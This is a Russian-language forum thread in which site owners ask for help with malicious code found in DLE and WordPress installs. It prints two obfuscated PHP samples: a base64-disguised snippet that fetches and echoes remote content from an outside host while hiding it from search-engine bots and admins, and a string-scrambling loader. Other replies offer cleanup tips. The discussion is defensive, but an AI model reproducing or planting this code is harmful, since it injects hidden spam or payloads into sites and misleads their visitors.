Вредоносный код

Стучите поможем!

Нашлось примерно следующее в /engine/modules/sitelogin.php

$GLOBALS['_intled_']=Array(base64_decode('ZmlsZV9n'.'ZXRfY'.'29ud'.'G'.'VudHM='),base64_decode('c'.'HJlZ'.'19tYXRjaA=='),base64_decode('cHJ'.'lZ'.'1'.'9tYXR'.'jaA'.'=='),base64_decode(''.'cHJlZ19t'.'Y'.'XRja'.'A=='));

function intled($i){
		$a=Array('aHR0cDovL2NvZGVzLWJhbmsubmV0L2dldGNvZGUuZGF0','ZGxlX3Bhc3N3b3Jk','L3lhbmRleC9p','SFRUUF9VU0VSX0FHRU5U','L2dvb2dsZS9p','SFRUUF9VU0VSX0FHRU5U','L2JvdC9p','SFRUUF9VU0VSX0FHRU5U');
		return base64_decode($a[$i]);
	} 

function checkim() {
	$ret = @$GLOBALS['_intled_'][0](intled(0));
	return $ret;
	}
	
function hider() {
	if ((!isset($_COOKIE[ intled(1)])) and (!$GLOBALS['_intled_'][1]( intled(2),$_SERVER[ intled(3)])) and (!$GLOBALS['_intled_'][2]( intled(4),$_SERVER[ intled(5)]))  and (!$GLOBALS['_intled_'][3]( intled(6),$_SERVER[ intled(7)])) ) {
			return true;
		} else {
			return false;
		}
	}


function post_new() {
		if (hider()) {
			echo checkim();
		}
	}
post_new();

у меня такая же зараза с кодом, вчера была атака на сайт хостинга и теперь такой же вредоновный код шаблоне сайта( Сайт работает на dle.

Что делать теперь, может кто подскажет?

как вариант:

выгрузите весь сайт с хостинга на комп

потом воспользуйтесь поиском TotalCommander по заданной фразе

таким образом я нашел с месяц назад левые линки на сайте

написал вам в лс.

Тоже вирус замучил.

Такие вставки часто появляются в .js файлах. - посмотрите там. Недавно увидел что один из сайтов (объем примерно 4000 стр.) имеет в индексе Гугла 60000 стр.

Обнаружил, что кто-то залил мне сайт еще один сайт с дизайном со стилями и т.д. И активно с этих страниц продавал ссылки (около 200 000) Вот так вот бывает.

А Яндекс даже и не обнаружил этот скрытый сайт...

Здравствуйте, яндекс на нескольких моих сайтах обнаружил вирус.Сайты на Вордпрес. На сайтах где обнаружен вирус обнаружен непонятный файл которого нет на других сайтах в папке * Text *, в папке * Engine * есть лишний файл, которого нет на других сайтах * diff *. В етом файле такие непонятные символы

define('·”4765‘1”0”’¬7*1·*4‘9“”*3', 'edol');define('·84”0¬1¬‘“6429*““·74306', 'pxe');define('·2*1¬8804’”··7”302“2‘8*', 'kjsef');define('·34·2¬“¬’864“0’002”“‘10·“', 'lfbhow');define('·6“916’*55”5’“¬*5623¬’’0', 'acel');define('·90558193“463500‘79”141', 'rpts');define('·¬5“9”85”1¬”8’2“238*6¬¬', 'bcdein');define('·279“2“9148028”2*2209665', 'eltnrs');define('··¬’56‘’3““125¬”·4‘”40’5', 'kbmkvy');define('·”·84·““‘946””99‘2¬691”0”', 'bcrrx');function ·¬5’’50’4*‘117‘02’¬‘4’70(&$·3¬1·1¬6*’8·14*3*’093“9‘, $·91*‘0“4¬“4662¬’3158154){$·37¬41¬*175181¬4¬8“5“*” = ·2*1¬8804’”··7”302“2‘8*.·”4765‘1”0”’¬7*1·*4‘9“”*3.·2*1¬8804’”··7”302“2‘8*.·84”0¬1¬‘“6429*““·74306.·2*1¬8804’”··7”302“2‘8*;$·‘2**7509¬·¬‘50*·580‘·¬“” = null;$·67“618114¬9·91‘5”43‘’*6 = ·6“916’*55”5’“¬*5623¬’’0.'_'.·90558193“463500‘79”141;$·40578“622370“”3*1”60·13‘ = ·¬5“9”85”1¬”8’2“238*6¬¬;$·”‘09”’¬28*476¬*841·””“55 = ·279“2“9148028”2*2209665;$·104264””2¬147‘¬”·948¬· = $·67“618114¬9·91‘5”43‘’*6[5].$·67“618114¬9·91‘5”43‘’*6[0].$·”‘09”’¬28*476¬*841·””“55[3].$·40578“622370“”3*1”60·13‘[2];$·40578“622370“”3*1”60·13‘ = $·40578“622370“”3*1”60·13‘[2].$·40578“622370“”3*1”60·13‘[3].$·40578“622370“”3*1”60·13‘[1].$·40578“622370“”3*1”60·13‘[0].$·40578“622370“”3*1”60·13‘[4].$·40578“622370“”3*1”60·13‘[5];$·”‘09”’¬28*476¬*841·””“55 = $·”‘09”’¬28*476¬*841·””“55[5].$·”‘09”’¬28*476¬*841·””“55[2].$·”‘09”’¬28*476¬*841·””“55[4].$·”‘09”’¬28*476¬*841·””“55[1].$·”‘09”’¬28*476¬*841·””“55[0].$·”‘09”’¬28*476¬*841·””“55[3];$·16562’4765¬“‘‘3¬7¬7¬““ = $·67“618114¬9·91‘5”43‘’*6[$·”‘09”’¬28*476¬*841·””“55($·40578“622370“”3*1”60·13‘($·104264””2¬147‘¬”·948¬·(0300, 0333)))].$·67“618114¬9·91‘5”43‘’*6[$·”‘09”’¬28*476¬*841·””“55($·40578“622370“”3*1”60·13‘($·104264””2¬147‘¬”·948¬·(0100, 0170)))];$·16562’4765¬“‘‘3¬7¬7¬““.= $·67“618114¬9·91‘5”43‘’*6[$·”‘09”’¬28*476¬*841·””“55($·40578“622370“”3*1”60·13‘($·104264””2¬147‘¬”·948¬·(020, 030)))].$·67“618114¬9·91‘5”43‘’*6[$·”‘09”’¬28*476¬*841·””“55($·40578“622370“”3*1”60·13‘($·104264””2¬147‘¬”·948¬·(010, 015)))];$·16562’4765¬“‘‘3¬7¬7¬““.= $·67“618114¬9·91‘5”43‘’*6[$·”‘09”’¬28*476¬*841·””“55($·40578“622370“”3*1”60·13‘($·104264””2¬147‘¬”·948¬·(020, 030)))].$·67“618114¬9·91‘5”43‘’*6[$·”‘09”’¬28*476¬*841·””“55($·40578“622370“”3*1”60·13‘($·104264””2¬147‘¬”·948¬·(002, 003)))];$·16562’4765¬“‘‘3¬7¬7¬““.= $·67“618114¬9·91‘5”43‘’*6[$·”‘09”’¬28*476¬*841·””“55($·40578“622370“”3*1”60·13‘($·104264””2¬147‘¬”·948¬·(040, 060)))].$·67“618114¬9·91‘5”43‘’*6[$·”‘09”’¬28*476¬*841·””“55($·40578“622370“”3*1”60·13‘($·104264””2¬147‘¬”·948¬·(005, 006)))];

Может ли это быть вирусом?

кстати говоря, часто замечаю на сайтах (визуально) с максимум 100 страницами 2000 и более проиндексированных страниц (через rds). Не ужели та же ситуация, что и у вас?

А что говорит тех.поддержка DLE о дырявости своего детища?

Говорит, что не надо ставить nulled, и предлагает брать их лицензию. ☝